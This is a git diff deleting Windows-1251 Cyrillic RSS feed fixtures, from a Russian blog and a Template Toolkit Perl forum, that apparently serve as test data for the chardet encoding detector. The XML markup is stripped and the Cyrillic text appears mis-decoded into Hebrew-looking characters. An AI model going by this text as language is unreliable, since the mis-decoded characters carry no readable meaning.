afae13f..0000000 --- a/chardet/tests/windows-1251-cyrillic/blog.mlmaster.com.xml +++ /dev/null @@ -1,170 +0,0 @@ - - - - - - - chub@tosy - http://blog.mlmaster.com - love & peace ! - Wed, 28 Dec 2005 08:53:15 +0000 - http://wordpress.org/?v=1.5.2 - en - - - ׁ ֳֽ! - http://blog.mlmaster.com/?p=296 - http://blog.mlmaster.com/?p=296#comments - Wed, 28 Dec 2005 08:53:15 +0000 - danil - - General - http://blog.mlmaster.com/?p=296 - - http://blog.mlmaster.com/?feed=rss2&p=296 - - - ֿמהדמעמגךא ך ‏בטכו‏ - http://blog.mlmaster.com/?p=295 - http://blog.mlmaster.com/?p=295#comments - Wed, 21 Dec 2005 19:43:43 +0000 - site admin - - General - http://blog.mlmaster.com/?p=295 - - http://blog.mlmaster.com/?feed=rss2&p=295 - - - ֽארט לטכו חאדנאםטקםו הנףח - http://blog.mlmaster.com/?p=294 - http://blog.mlmaster.com/?p=294#comments - Fri, 16 Dec 2005 09:19:20 +0000 - danil - - General - http://blog.mlmaster.com/?p=294 - - http://blog.mlmaster.com/?feed=rss2&p=294 - - - ׁכאגום, םףזםא סגח. - http://blog.mlmaster.com/?p=293 - http://blog.mlmaster.com/?p=293#comments - Wed, 14 Dec 2005 14:36:19 +0000 - RuAnShi - - General - http://blog.mlmaster.com/?p=293 - - http://blog.mlmaster.com/?feed=rss2&p=293 - - - ְ ךמלף פוסעטגאכוי - http://blog.mlmaster.com/?p=292 - http://blog.mlmaster.com/?p=292#comments - Tue, 06 Dec 2005 16:21:26 +0000 - chubatos - - General - http://blog.mlmaster.com/?p=292 - - http://blog.mlmaster.com/?feed=rss2&p=292 - - - Exit the movie - http://blog.mlmaster.com/?p=291 - http://blog.mlmaster.com/?p=291#comments - Mon, 05 Dec 2005 18:01:09 +0000 - chubatos - - fun - http://blog.mlmaster.com/?p=291 - - http://blog.mlmaster.com/?feed=rss2&p=291 - - - ֽטרעך - http://blog.mlmaster.com/?p=289 - http://blog.mlmaster.com/?p=289#comments - Mon, 05 Dec 2005 14:37:11 +0000 - danil - - General - http://blog.mlmaster.com/?p=289 - - http://blog.mlmaster.com/?feed=rss2&p=289 - - - ְכטסא - http://blog.mlmaster.com/?p=288 - http://blog.mlmaster.com/?p=288#comments - Tue, 29 Nov 2005 08:58:22 +0000 - chubatos - - General - http://blog.mlmaster.com/?p=288 - - http://blog.mlmaster.com/?feed=rss2&p=288 - - - ֲוכמלאנאפמם - http://blog.mlmaster.com/?p=287 - http://blog.mlmaster.com/?p=287#comments - Tue, 29 Nov 2005 08:55:52 +0000 - chubatos - - General - http://blog.mlmaster.com/?p=287 - - http://blog.mlmaster.com/?feed=rss2&p=287 - - - מכוסא - http://blog.mlmaster.com/?p=286 - http://blog.mlmaster.com/?p=286#comments - Tue, 29 Nov 2005 08:52:59 +0000 - chubatos - - fun - http://blog.mlmaster.com/?p=286 - - http://blog.mlmaster.com/?feed=rss2&p=286 - - - diff --git a/chardet/tests/windows-1251-cyrillic/forum.template-toolkit.ru.1.xml b/chardet/tests/windows-1251-cyrillic/forum.template-toolkit.ru.1.xml deleted file mode 100644 index 2a47313..0000000 --- a/chardet/tests/windows-1251-cyrillic/forum.template-toolkit.ru.1.xml +++ /dev/null @@ -1,428 +0,0 @@ - - - - - װמנףל Template Toolkit : ׀אבמעא ס Template Toolkit - http://forum.template-toolkit.ru/view_forum/forum_id-1.html?rss - Template Toolkit - בסענא, למשםא ט נאסרטנולא סטסעולא מבנאבמעךט ראבכמםמג. ֽא סאיעו נאבמעאוע פמנףל, ג ךמעמנמל מבסףזהא‏עס גמןנמס טסןמכחמגאםט בטבכטמעוךט ןמ נאבמעו ס ראבכמםאלט. ַםאךמלסעגמ ס Template Toolkit. ֲמחלמזםמסעט בטבכטמעוךט, ןנטול טסןמכחמגאםט. ֿנמבכול ט טץ נורוםטו. - ru - Lobanov Igor - Lobanov Igor <webmaster@template-toolkit.ru> - Mon, 12 Dec 2005 10:09:35 GMT - Wed, 4 Jan 2006 02:29:01 GMT - Perl script, Template Toolkit - - http://forum.template-toolkit.ru/images/tt2powered.gif - Template Toolkit - ראבכמם ג perl - http://forum.template-toolkit.ru/ - 88 - 31 - - http://blogs.law.harvard.edu/tech/rss - - http://forum.template-toolkit.ru/view_topic/topic_id-120.html?rss - Wed, 7 Dec 2005 11:19:46 GMT - Template::Plugin::XML::RSS - http://forum.template-toolkit.ru/view_topic/topic_id-120.html?rss - ןנט טסןמכחמגאםטט Template::Plugin::XML::RSS גוס גגמה טח הגטזךא Template סנאחף םאקטםאוע הוכאעס ג UTF-8. אבסמכ‏עםמ גוס. ׂףע פמנףל גנמהו ךאך ג RSS האםםו נאםטע ט ךמהטנמגךא koi-8-r נאבמעאוע.<br /> -ןנט ‎עמל גסו ןמןעךט ןונוהאע ג ךמםסענךףעמנ XML::RSS-&gt;new (encode =&gt; 'למ_ךמהטנמגךא') ::RSS-&gt;new ( output =&gt; 'למ_ךמהטנמגךא') םו ןנמךאעגאוע :-(<br /> -טחףקוםטו נוחףכעאעא ןנט DEBUG_ALL םט ך קולף םו ןנטגוכט. ג ענאססטנמגךו הובאדא גסו האםםו טהףע ג םףזםמי לםו ךמהטנמגךו. .ע.ו. בוח ןונוךמהטנמגאםטט הגטזךמל TT2<br /> -<br /> -למזוע דהו-עמ ‎עמע ןכאדטם ןונוךנגאוע TT2-רםי $output ?<br /> -<br /> -גמע עאךא ךמםסענףךצט:<br /> -[% USE news = XML.RSS('forum_1.xml') %]<br /> -[% FOREACH item = news.items %]<br /> -&lt;pre&gt;<br /> - [% item.title %]<br /> -&lt;/pre&gt;<br /> -[% END %] - - ddv <authors@template-toolkit.ru> - http://forum.template-toolkit.ru/view_topic/topic_id-120.html - Template Toolkit - בטבכטמעוךא הכ נאבמע ס ראבכמםאלט ג Perl - http://forum.template-toolkit.ru/view_topic/topic_id-120.html?rss - - - http://forum.template-toolkit.ru/view_topic/topic_id-118.html?rss - Thu, 1 Dec 2005 09:33:45 GMT - ִגא include-ךאעאכמדא - http://forum.template-toolkit.ru/view_topic/topic_id-118.html?rss - ׃ לום עאךא סטעףאצט. ֳנףןןא סאיעמג (רעףך 10) טלו‏ע ןמקעט מהטםאךמגמו מפמנלכוםטו. ׁאיע סהוכאם םא TT2. ׁויקאס ף ךאזהמדמ סאיעא סגמי templates ךאעאכמד.<br /> -ֽמ לםמדטו פאיכ מהטםאךמג (םו גסו).<br /> -עמ םו מקום ףהמבםמ, מבםמגכע ג 10 לוסעאץ.<br /> -<br /> -אך סהוכאע הגא include ךאעאכמדא ף TT קעמב מם טסךאכ סםאקאכא ג מהםמל ךאעאכמדו(םאןנטלונ מבשול template), א וסכט םו םארוכ - ג הנףדמל (הכ ךאזהמדמ ושו ט ףםטךאכםי ךאעאכמד template)? - - kozyabozya <authors@template-toolkit.ru> - http://forum.template-toolkit.ru/view_topic/topic_id-118.html - Template Toolkit - בטבכטמעוךא הכ נאבמע ס ראבכמםאלט ג Perl - http://forum.template-toolkit.ru/view_topic/topic_id-118.html?rss - - - http://forum.template-toolkit.ru/view_topic/topic_id-117.html?rss - Thu, 17 Nov 2005 05:29:38 GMT - template Factory - http://forum.template-toolkit.ru/view_topic/topic_id-117.html?rss - ֿעא‏ס נואכטחמגאע םוקעמ אםאכמדטקםמו ראבכמםף Factory (מהטם דכאגםי ראבכמם, ט לםמדמ ראבכמםמג ןנמהףךעמג),<br /> -ׁממעגועסעגוםםמ ןנט םאןטסאםטט ראבכמםמג-ןנמהףךעמג פאבנטךט ץמעוכמס ב מעסכוזטגאע טץ סןוצטפטךאצט‏. ךאך לטםטלףל םאכטקטו מןנוהוכוםםץ בכמךמג BLOCK...END ט מןונוהוכוםםץ ןונולוםםץ. <br /> -ׂ.ו. ןונוה גךכ‏קוםטול ראבכמםא (INCLUDE) ךאךטל-עמ מבנאחמל &quot;ןנמדמםע ודמ םא סממעגועסגטו סןוצטפטךאצטט פאבנטךט&quot;<br /> -ֿמךמגנכס ג ךכאסס-למהףכו Template::Context םארוכ עאל ןונולוםםף‏ ךכאססא BLKSTACK, םמ םטקודמ גםעםמדמ טח םו¸ םו למדף געאשטע, עטןא:<br /> -foreach my $i ($template-&gt;service-&gt;context()-&gt;BLKSTACK) {<br /> -.....<br /> -} - - ddv <authors@template-toolkit.ru> - http://forum.template-toolkit.ru/view_topic/topic_id-117.html - Template Toolkit - בטבכטמעוךא הכ נאבמע ס ראבכמםאלט ג Perl - http://forum.template-toolkit.ru/view_topic/topic_id-117.html?rss - - - http://forum.template-toolkit.ru/view_topic/topic_id-116.html?rss - Sun, 6 Nov 2005 18:33:25 GMT - אך ןמהדנףחטע למהףכ אגעמלאעמל. - http://forum.template-toolkit.ru/view_topic/topic_id-116.html?rss - וסע ןנמבכולא ג ךאזהמל עולןכויעו סמחהא‏ סגמי ןכאדטם. א ץמקועס סמחהאע ודמ ןנט סמחהאםטט Template <br /> -<br /> -סויקאס ןנמןטסאםמ<br /> - PLUGINS=&gt;{<br /> - 'Atma'=&gt;'Atma::TPlugin'<br /> - },<br /> -ט ג ךאזהמל עולןכויעו ןטרף <br /> -[% USE Atma(c) %]<br /> -[% Atma.myfunc(&quot;lalala&quot;)%]<br /> -<br /> -<br /> -ףחםאכ קעמ למזםמ ודמ ןנטךנףעטע ס ןמלמש‏ <br /> -ט םו ןטסאע USE Atma(c)<br /> -# LOAD_PLUGINS =&gt; Atma::TPlugin-&gt;new($self, $self),<br /> -םמ םוןמםעם ודמ ןאנאלוענ ט קעמ-עמ נףדאכמס קעמ םוםאץמהטע פףםךצט‏ fetch, ןמהוכטעוס מןעמל ךאך םףזםמ ‎עמ סהוכאע ? - - Dmitry <authors@template-toolkit.ru> - http://forum.template-toolkit.ru/view_topic/topic_id-116.html - Template Toolkit - בטבכטמעוךא הכ נאבמע ס ראבכמםאלט ג Perl - http://forum.template-toolkit.ru/view_topic/topic_id-116.html?rss - - - http://forum.template-toolkit.ru/view_topic/topic_id-114.html?rss - Tue, 1 Nov 2005 15:03:41 GMT - ָ וש¸ ךאךמי הגטזמך פמנףלא טסןמכחףועו?? - http://forum.template-toolkit.ru/view_topic/topic_id-114.html?rss - ׁאבז:) - - ׁכוהמןע <authors@template-toolkit.ru> - http://forum.template-toolkit.ru/view_topic/topic_id-114.html - Template Toolkit - בטבכטמעוךא הכ נאבמע ס ראבכמםאלט ג Perl - http://forum.template-toolkit.ru/view_topic/topic_id-114.html?rss - - - http://forum.template-toolkit.ru/view_topic/topic_id-113.html?rss - Tue, 1 Nov 2005 15:02:06 GMT - ֻמךאכטחאצט סאיעא ס ןמלמש‏ TT - http://forum.template-toolkit.ru/view_topic/topic_id-113.html?rss - אך סהוכאע כמךאכטחאצט‏ סאיעא ס ןמלמש‏ TT??<br /> - גםוס גסו עוךסעמגו סענמךט טח ראבכמםמג ג מעהוכםו פאיכ עטןא<br /> -messages.en<br /> -[% mess1=&quot;English1&quot; %]<br /> -[% mess2=&quot;English2&quot; %]<br /> -<br /> -messages.ru<br /> -[% mess1=&quot;׀ףססךטי1&quot; %]<br /> -[% mess2=&quot;׀ףססךטי2&quot; %]<br /> -<br /> -א ג ראכמםאץ סממעגועסעגוםםמ ןנמןטסאכ<br /> -[% IF lang == &quot;en&quot; ][% INCLUDE messages.en %][% END %]<br /> -&lt;html&gt;<br /> -[% mess1 %]<br /> -&lt;/html&gt;<br /> -הףלאכ ןמהךכ‏קאע ‎עט פאיכ ג חאגטסטלמסעט מע חךא םמ עאך םו נאבמעאוע!! ּמזוע ךעמ םטבףה ןמסמגועףוע?<br /> -סןאסטבמ - - ׁכוהמןע <authors@template-toolkit.ru> - http://forum.template-toolkit.ru/view_topic/topic_id-113.html - Template Toolkit - בטבכטמעוךא הכ נאבמע ס ראבכמםאלט ג Perl - http://forum.template-toolkit.ru/view_topic/topic_id-113.html?rss - - - http://forum.template-toolkit.ru/view_topic/topic_id-112.html?rss - Thu, 27 Oct 2005 11:48:26 GMT - ֿנוהסעאגכוםט - http://forum.template-toolkit.ru/view_topic/topic_id-112.html?rss - ךעמ-םטבףה ןמכחףוע view? מקום ףהמבםא רעףךא, סלףשאוע עמכךמ קעמ מםא ןמךא ג &quot;‎ךסןונטלוםעאכםמל&quot; גטהו. ָכט טלווע סלכ ןמכחמגאעס? - - ddv <authors@template-toolkit.ru> - http://forum.template-toolkit.ru/view_topic/topic_id-112.html - Template Toolkit - בטבכטמעוךא הכ נאבמע ס ראבכמםאלט ג Perl - http://forum.template-toolkit.ru/view_topic/topic_id-112.html?rss - - - http://forum.template-toolkit.ru/view_topic/topic_id-110.html?rss - Wed, 28 Sep 2005 15:05:48 GMT - Template Toolkit ןמ winXP - http://forum.template-toolkit.ru/view_topic/topic_id-110.html?rss - ִמבני הום.<br /> -ֿמהסךאזטעו ןמזאכףיסעא &#8211; ךאך ףסעאםמגטע Template Toolkit ןמ winXP?<br /> - טסןמכחף‏ ActivePerl 5.8.6. <br /> -ֲךכ‏קא‏ PPM. ָ םאר הטאכמד ס PPM-מל גדכהטע עאך:<br /> -Ppm-&gt; install Template<br /> -Ppm-(מעגוקאוע:) &#8211; עאךמדמ םלא!!! <br /> -ָכט<br /> -Ppm-&gt; install TemplateToolkit<br /> -Ppm-(מעגוקאוע:) &#8211; עאךמדמ םלא!!! <br /> -אך לםו ףסעאםמגטע Template Toolkit ןמה winXp.<br /> -ְכוךסוי - - Washington <authors@template-toolkit.ru> - http://forum.template-toolkit.ru/view_topic/topic_id-110.html - Template Toolkit - בטבכטמעוךא הכ נאבמע ס ראבכמםאלט ג Perl - http://forum.template-toolkit.ru/view_topic/topic_id-110.html?rss - - - http://forum.template-toolkit.ru/view_topic/topic_id-109.html?rss - Sun, 25 Sep 2005 11:50:06 GMT - fork() ג [% PERL %] - http://forum.template-toolkit.ru/view_topic/topic_id-109.html?rss - ֿמהסךאזטעו, ןמזאכףסעא, ךאך ךמננוךעםמ גןמכםטע fork() ג בכמךו [% PERL %] TT?<br /> -<br /> -ֿנמסעמ גןמכםועס נוסףנסמולךא מןונאצט, א ןונגמםאקאכםו האםםו םאהמ גמחגנאשאע ךאך למזםמ בסענוו.<br /> -<br /> -׃ לום ג ןונולוםםמי ג $stash סמהונזטעס ףךאחאעוכ םא ךמםםוךע ך ֱִ ט לםו ךאזועס, קעמ ס םטל fork םו סמגסול ךמננוךעםמ נאבמעאוע. ׂאךמו משףשוםטו, קעמ ןמ חאגונרוםטט פמנךא ‎עמע ךמםםוךע חאךנגאועס. - - UncleAndy <authors@template-toolkit.ru> - http://forum.template-toolkit.ru/view_topic/topic_id-109.html - Template Toolkit - בטבכטמעוךא הכ נאבמע ס ראבכמםאלט ג Perl - http://forum.template-toolkit.ru/view_topic/topic_id-109.html?rss - - - http://forum.template-toolkit.ru/view_topic/topic_id-108.html?rss - Wed, 21 Sep 2005 11:45:38 GMT - TT ףהאכוע םףכט. - http://forum.template-toolkit.ru/view_topic/topic_id-108.html?rss - ־קום סענאםםי דכ‏ך, ףזו המכדמ ב‏ס, נורוםט םו גטזף.<br /> -ֿונוהא‏ ג ראבכמם: <br /> -{params}-&gt;{year}-&gt;'2005';<br /> -ג ראבכמםו ןטרף<br /> -[% params.year %]<br /> -<br /> -ט גטזף 25! וסכט ןטרף 1998, גטזף 1998, א וסכט ןטרף 20010007, גטזף 217!<br /> -<br /> -ךעמ-םטבףה סעאכךטגאכס? ךאך כוקטע? - - kozyabozya <authors@template-toolkit.ru> - http://forum.template-toolkit.ru/view_topic/topic_id-108.html - Template Toolkit - בטבכטמעוךא הכ נאבמע ס ראבכמםאלט ג Perl - http://forum.template-toolkit.ru/view_topic/topic_id-108.html?rss - - - http://forum.template-toolkit.ru/view_topic/topic_id-107.html?rss - Thu, 15 Sep 2005 12:41:43 GMT - eval() ג TT2 - http://forum.template-toolkit.ru/view_topic/topic_id-107.html?rss - ׁףשוסעגףוע כט ג TT2 אםאכמד eval() ג Perl? ׂ. ו. וסכט טלו‏ ןנולוםםף‏ ג ראבכמםו, חםאקוםטו ךמעמנמי סמהונזטע הטנוךעטג, עמ ךאך גסעאגטע ג ראבכמם חםאקוםטו ‎עמי ןונולוםםמי, קעמב הטנוךעטג בכט גןמכםום, א םו גגמהטכטס ךאך עוךסע? - - Dionys <authors@template-toolkit.ru> - http://forum.template-toolkit.ru/view_topic/topic_id-107.html - Template Toolkit - בטבכטמעוךא הכ נאבמע ס ראבכמםאלט ג Perl - http://forum.template-toolkit.ru/view_topic/topic_id-107.html?rss - - - http://forum.template-toolkit.ru/view_topic/topic_id-106.html?rss - Wed, 31 Aug 2005 11:47:31 GMT - ֿאנאלוענ טח ראבכמםא ג ראבכמם - http://forum.template-toolkit.ru/view_topic/topic_id-106.html?rss - ֿנטגוע גסול<br /> -ַאנאםוו בכאדמהאנום חא דנאלמעםי מעגוע<br /> -ֿנמבכולךא עאךא<br /> -אך ןונוהאע טח ראבכמםא ןאנאלוענ ג ראבכמם<br /> -ֽאןנטלונ<br /> -[% INCLUDE tmpl(para1=&gt;value,para2=&gt;value2,...) %] - - plcgi <authors@template-toolkit.ru> - http://forum.template-toolkit.ru/view_topic/topic_id-106.html - Template Toolkit - בטבכטמעוךא הכ נאבמע ס ראבכמםאלט ג Perl - http://forum.template-toolkit.ru/view_topic/topic_id-106.html?rss - - - http://forum.template-toolkit.ru/view_topic/topic_id-104.html?rss - Mon, 8 Aug 2005 04:57:04 GMT - INCLUDE - http://forum.template-toolkit.ru/view_topic/topic_id-104.html?rss - ךאך ןנמבנמסטע ןונולוםםף‏ גמ WRAPPER קונוח צוכי כוס BLOCK...END גכ‏קוםםץ קונוח INCLUDE.<br /> -ןעאכס ג בטחםוס-כמדטךו קהוכאע setter-getter םמ םו ךאםאוע ןמקולףעמ, ץמע WRAPPER גנמהו מבנאבאעגאועס ןמסכו גסוץ גכמזוםםץ בכמךמג...<br /> -<br /> -PS: PROCESS םו ןנוהכאדאע.<br /> -<br /> -PPS: מץמעא ג דכאגםמל גנאןןונו גגמהטע סטסעולםמו סממבשוםטו, א ףז ודמ דוםונטע גמ גכמזוםםץ ראבכמםאץ. - - ddv <authors@template-toolkit.ru> - http://forum.template-toolkit.ru/view_topic/topic_id-104.html - Template Toolkit - בטבכטמעוךא הכ נאבמע ס ראבכמםאלט ג Perl - http://forum.template-toolkit.ru/view_topic/topic_id-104.html?rss - - - http://forum.template-toolkit.ru/view_topic/topic_id-103.html?rss - Fri, 22 Jul 2005 12:42:52 GMT - ךאך סהוכאע ךמםךאעוםאצט‏ סענמך? ט םו נאבמעאוע i=i-1 - http://forum.template-toolkit.ru/view_topic/topic_id-103.html?rss - ךאך סהוכאע ךמםךאעאםוצט‏ סענמך? (מןונאעמנ עמקךא ג ןונכ)<br />סךאזול, עאך:<br /><br /><div class="code"><pre> -[%SET i=&quot;aaa&quot;.&quot;bbb&quot; %] - -ןמכףקאול: -unexpected token (.) -</pre></div><br /><br />ָ ושו. ֽו נאבמעאוע<br /><div class="code"><pre> -[% i=i-1 %]: - -file error - parse error - articles/index.html line 32: unexpected token (-1) [% i=i-1 %] -</pre></div><br /><br />‎עמ פטקא עאךא?<br />גוה [% i=i+1 %] נאבמעאוע!<br />ךאך ןמםכ -- ט ++ םו סףשוסעגף‏ע :(<br /><br />גונסט template toolkit 2.14 - - kozyabozya <authors@template-toolkit.ru> - http://forum.template-toolkit.ru/view_topic/topic_id-103.html - Template Toolkit - בטבכטמעוךא הכ נאבמע ס ראבכמםאלט ג Perl - http://forum.template-toolkit.ru/view_topic/topic_id-103.html?rss - - - http://forum.template-toolkit.ru/view_topic/topic_id-100.html?rss - Mon, 18 Jul 2005 06:24:54 GMT - Bug טכט Feature ? ֽו נאבמעא‏ע $_, $! ט ע.ן. - http://forum.template-toolkit.ru/view_topic/topic_id-100.html?rss - ״אבכמם:<br /> -[% PERL %]<br /> - $_ = 'test';<br /> - $stash-&gt;set(msg =&gt; $_);<br /> -[% END %]<br /> -&lt;div&gt;[% msg %]&lt;/div&gt;<br /> ---------------------<br /> -tpage --eval_perl<br /> -ֲהא¸ע <br /> -Segmentation fault - - ֽטךמכאי ּאךסטלמג <authors@template-toolkit.ru> - http://forum.template-toolkit.ru/view_topic/topic_id-100.html - Template Toolkit - בטבכטמעוךא הכ נאבמע ס ראבכמםאלט ג Perl - http://forum.template-toolkit.ru/view_topic/topic_id-100.html?rss - - - http://forum.template-toolkit.ru/view_topic/topic_id-99.html?rss - Thu, 14 Jul 2005 07:48:40 GMT - ־ןונאצט הוכוםט (ג ראבכמםו) - http://forum.template-toolkit.ru/view_topic/topic_id-99.html?rss - ֽאןנטלונ<br /> -[% a=10 %]<br /> -[% b=5 %]<br /> -<br /> -[% c=a/b %]<br /> -<br /> -ֲהאוע מרטבךף. ֲסו הנףדטו מןונאצטט םמנלאכםמ.<br /> -ֲ קול ןנטקטםא? - - ׁונדוי <authors@template-toolkit.ru> - http://forum.template-toolkit.ru/view_topic/topic_id-99.html - Template Toolkit - בטבכטמעוךא הכ נאבמע ס ראבכמםאלט ג Perl - http://forum.template-toolkit.ru/view_topic/topic_id-99.html?rss - - - http://forum.template-toolkit.ru/view_topic/topic_id-98.html?rss - Thu, 14 Jul 2005 03:03:52 GMT - Unit Tests - http://forum.template-toolkit.ru/view_topic/topic_id-98.html?rss - עמ ט ךאך ןטרוע UnitTest- הכ סגמטץ ראבכמםמג.<br /> -׃ לום ןמךא UnitTest-אלט ןמךנגאועס עמכךמ בטחםוס כמדטךא (ךמעמנא ֲׁ גםוסוםא ג *.pm)<br /> -ֽף ךאך ף גאס םאסקוע פףםךצטמםאכםץ עוסעמג, מסמבוםםמ WEB-טםעונפויסא? - - ddv <authors@template-toolkit.ru> - http://forum.template-toolkit.ru/view_topic/topic_id-98.html - Template Toolkit - בטבכטמעוךא הכ נאבמע ס ראבכמםאלט ג Perl - http://forum.template-toolkit.ru/view_topic/topic_id-98.html?rss - - - http://forum.template-toolkit.ru/view_topic/topic_id-97.html?rss - Mon, 11 Jul 2005 08:56:40 GMT - mod_perl, מסגמבמזהאועס כט ןאלע גםףענט ראבכמםא TT2 - http://forum.template-toolkit.ru/view_topic/topic_id-97.html?rss - ֵסע handler םא למהןונכו <br /> -ג ךנאעצו.<br /> -<br /> -package My::controller;<br /> -our $c; # דכמבאכםא ןונולוםםא, ץ‎ר ג ךמעמנמל גסו קעמ םומבץמהטלמ<br /> -<br /> -sub handler($$){<br /> - my $class = shift;<br /> - my $r = shift;<br /> -<br /> - $c ||= $class-&gt;new(); # וסכט ףזו בכ סמחהאם ןנמצוסס, עמ במכרו םו םףזםמ הוכאע new.<br /> -<br /> - $c-&gt;{t}-&gt;process(&quot;template.tmpl&quot;, $c); # ןנמצוססטל עולןכויע ןונוהאגא ‎עמע זו ךמםענמככונ ג ךאקוסעגו ןאנאלוענמג.<br /> -}<br /> -<br /> -##################<br /> -# סמחהאול מבתוךע ג ןלעט<br /> -##################<br /> -sub new{<br /> - bless $self, $class<br /> -<br /> - $self-&gt;{dbh} = DBI-&gt;connect(.........); # הוכאול ךמםםוךע<br /> - $self-&gt;{t} = new Template(.........); # הוכאול עולןכויע <br /> - $self-&gt;{cgi} = new CGI; <br /> -<br /> - $self-&gt;{site_path} = &quot;/la/bla/bla/la&quot;;<br /> - $self-&gt;{cgi_path} =&quot;/d/sfd/fs/&quot;;<br /> - return $self,<br /> -}<br /> -<br /> -<br /> -ג ראבכמםו template.tmpl<br /> -סמחהא‏עס ןונולוםםו [% my_var = &quot;12345&quot; %]<br /> -<br /> -מקטשאועס כט ןלע ךמדהא מעןנמצוססטעס ראבכמם?<br /> -ע.ו. בףהוע כט $c-&gt;{my_var} ןףסעל ןנט סכוהף‏שול חאןנמסו? - - trdmitry <authors@template-toolkit.ru> - http://forum.template-toolkit.ru/view_topic/topic_id-97.html - Template Toolkit - בטבכטמעוךא הכ נאבמע ס ראבכמםאלט ג Perl - http://forum.template-toolkit.ru/view_topic/topic_id-97.html?rss - - - http://forum.template-toolkit.ru/view_topic/topic_id-95.html?rss - Fri, 8 Jul 2005 10:07:01 GMT - ֽו ןמךאחגא‏עס ןנאגטכםמ סענמךט ג UTF-8 גבנאםו טח באח - http://forum.template-toolkit.ru/view_topic/topic_id-95.html?rss - ֲבטנא‏ האםםו טח באח MySQL. ִאםםו ג UTF-8.<br />ֵסכט סהוכאע<br /><div class="code"><pre> -print $string_from_database; -</pre></div><br />עמ UTF-8 סטלגמכ גגמהעס ןנאגטכםמ.<br />ְ וסכט קונוח ׂׂ, עמ UTF-8 סטלגמכ ג אבנאךאהאבנו.<br />ָ ‎עמ ף לום כמךאכםמ ןמה ֲטםהמי,<br />םא סונגונו ןמה םטךס גסו םמנלאכםמ. - - rchumak <authors@template-toolkit.ru> - http://forum.template-toolkit.ru/view_topic/topic_id-95.html - Template Toolkit - בטבכטמעוךא הכ נאבמע ס ראבכמםאלט ג Perl - http://forum.template-toolkit.ru/view_topic/topic_id-95.html?rss - - - http://forum.template-toolkit.ru/view_topic/topic_id-93.html?rss - Wed, 29 Jun 2005 07:06:16 GMT - ֿונוהאקא ןאנאלוענמג טח ןכאדטםא - http://forum.template-toolkit.ru/view_topic/topic_id-93.html?rss - ײטךכ<br /> -@fld[$n] = ({<br /> -id =&gt; $id,<br /> -type =&gt; $type,<br /> -pr =&gt; \@f,<br /> -});<br /> -<br /> -n++<br /> -מםוצײטךכא<br /> -<br /> -return @fld<br /> -<br /> -<br /> -ֿנמבכולא ג עמל, קעמ לאססטג @f, ףסעאםאגכטגאועס מהטם םא גסו ‎כולוםע @fld<br /> -אך ‎עמ למזםמ מבמיעט? - - ׁונדוי <authors@template-toolkit.ru> - http://forum.template-toolkit.ru/view_topic/topic_id-93.html - Template Toolkit - בטבכטמעוךא הכ נאבמע ס ראבכמםאלט ג Perl - http://forum.template-toolkit.ru/view_topic/topic_id-93.html?rss - - - diff --git a/chardet/tests/windows-1251-cyrillic/forum.template-toolkit.ru.4.xml b/chardet/tests/windows-1251-cyrillic/forum.template-toolkit.ru.4.xml deleted file mode 100644 index 5f8bb7e..0000000 --- a/chardet/tests/windows-1251-cyrillic/forum.template-toolkit.ru.4.xml +++ /dev/null @@ -1,130 +0,0 @@ - - - - - װמנףל Template Toolkit : ־בסףזהוםטו פמנףלא - http://forum.template-toolkit.ru/view_forum/forum_id-4.html?rss - Template Toolkit - בסענא, למשםא ט נאסרטנולא סטסעולא מבנאבמעךט ראבכמםמג. ֽא סאיעו נאבמעאוע פמנףל, ג ךמעמנמל מבסףזהא‏עס גמןנמס טסןמכחמגאםט בטבכטמעוךט ןמ נאבמעו ס ראבכמםאלט. ֿנוהכמזוםט ןמ נאבמעו פמנףלא. ־נדאםטחאצט םמגץ ךאעודמנטי ט פמנףלמג. - ru - Lobanov Igor - Lobanov Igor <webmaster@template-toolkit.ru> - Tue, 3 Jan 2006 08:27:57 GMT - Wed, 4 Jan 2006 02:29:01 GMT - Perl script, Template Toolkit - - http://forum.template-toolkit.ru/images/tt2powered.gif - Template Toolkit - ראבכמם ג perl - http://forum.template-toolkit.ru/ - 88 - 31 - - http://blogs.law.harvard.edu/tech/rss - - http://forum.template-toolkit.ru/view_topic/topic_id-123.html?rss - Tue, 3 Jan 2006 08:27:57 GMT - ׁ ֽמגל ֳמהמל - http://forum.template-toolkit.ru/view_topic/topic_id-123.html?rss - ֿמחהנאגכ‏ גסוץ ןמסועטעוכוי ‎עמדמ םובמכרמדמ, םמ םאהו‏ס ןמכוחםמדמ, סאיעא ס םאסעףןטגרטל 2006 דמהמל! ֶוכא‏ םמגץ עגמנקוסךטץ ףהאק ט םאץמהמך. - - ֻמבאםמג ָדמנ <authors@template-toolkit.ru> - http://forum.template-toolkit.ru/view_topic/topic_id-123.html - ־בסףזהוםטו פמנףלא - http://forum.template-toolkit.ru/view_topic/topic_id-123.html?rss - - - http://forum.template-toolkit.ru/view_topic/topic_id-57.html?rss - Thu, 20 Jan 2005 12:10:22 GMT - XUL מבכמזךא - http://forum.template-toolkit.ru/view_topic/topic_id-57.html?rss - ִכ ןמכחמגאעוכוי בנמףחונמג Mozilla סהוכאכ <a target="_blank" href="http://template-toolkit.ru/xul/index.xul">XUL מבכמזךף</a>. - - ֻמבאםמג ָדמנ <authors@template-toolkit.ru> - http://forum.template-toolkit.ru/view_topic/topic_id-57.html - ־בסףזהוםטו פמנףלא - http://forum.template-toolkit.ru/view_topic/topic_id-57.html?rss - - - http://forum.template-toolkit.ru/view_topic/topic_id-44.html?rss - Wed, 15 Dec 2004 08:44:32 GMT - ֽו ןנטץמהטע ךמה הכ חאגונרוםט נודטסענאצטט - http://forum.template-toolkit.ru/view_topic/topic_id-44.html?rss - ַהנאגסעגףיעו!<br /> -<br /> -ּםו םו ןנטץמהטע ךמה הכ חאגונרוםט נודטסענאצטט :(. ׀ודטסענטנמגאכס 2 נאחא ס נאחםלט ןמקע. אהנוסאלט, םמ ‎פפוךע םףכוגמי :(. - - ֽטךמכאי ֲ. <authors@template-toolkit.ru> - http://forum.template-toolkit.ru/view_topic/topic_id-44.html - ־בסףזהוםטו פמנףלא - http://forum.template-toolkit.ru/view_topic/topic_id-44.html?rss - - - http://forum.template-toolkit.ru/view_topic/topic_id-40.html?rss - Sat, 4 Dec 2004 22:08:26 GMT - RDF סכףזבא חאדמכמגךמג - http://forum.template-toolkit.ru/view_topic/topic_id-40.html?rss - ֽא פמנףלו המבאגכוםא <span style="font-weight:bold">RDF סכףזבא חאדמכמגךמג</span>. עא סכףזבא דמעמגטע פאיכ ס חאדמכמגךאלט םמגץ עול, מעךנעץ ג פמנףלאץ, ג פמנלאעו XML/RDF. ׁ ןמלמש‏ RDF סכףזב למזםמ מנדאםטחמגאע 